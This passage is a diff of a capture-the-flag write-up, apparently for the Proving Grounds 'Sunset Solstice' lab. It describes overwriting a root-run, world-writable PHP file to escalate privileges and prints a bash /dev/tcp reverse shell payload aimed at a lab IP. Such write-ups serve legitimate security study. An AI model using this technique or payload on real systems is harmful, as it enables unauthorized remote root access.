Ha-L0/Ha-L0.github.io/_posts/2022-12-12-[H4]-Proving-Grounds-Play-VULNHUB-Sunset-Solstice.md

 ...
 ```

-Stepping through these folders reveals that in the folder `/var/tmp/sv/` there is a file named `index.php` whis is owned and executed by `root` and is world writeble.
+Stepping through these processes reveals that in the folder `/var/tmp/sv/` is a file named `index.php` whis is owned and executed by `root` and is world writeble.
 The corresponding web server listens on localhost on port 57.

-So, the idea is to overwrite the file with own `PHP` code and access the resource on the web server to get `root` access.
+> So, the idea is to overwrite the file with own `PHP` code and access the resource on the web server to get `root` access.
-We recycle the reverse shell code we already used.
+> We recycle the reverse shell code we already used.
+{: .prompt-info }

 Overwrite the file with our payload.
 payload: `bash -c 'bash -i >& /dev/tcp/192.168.49.250/81 0>&1'`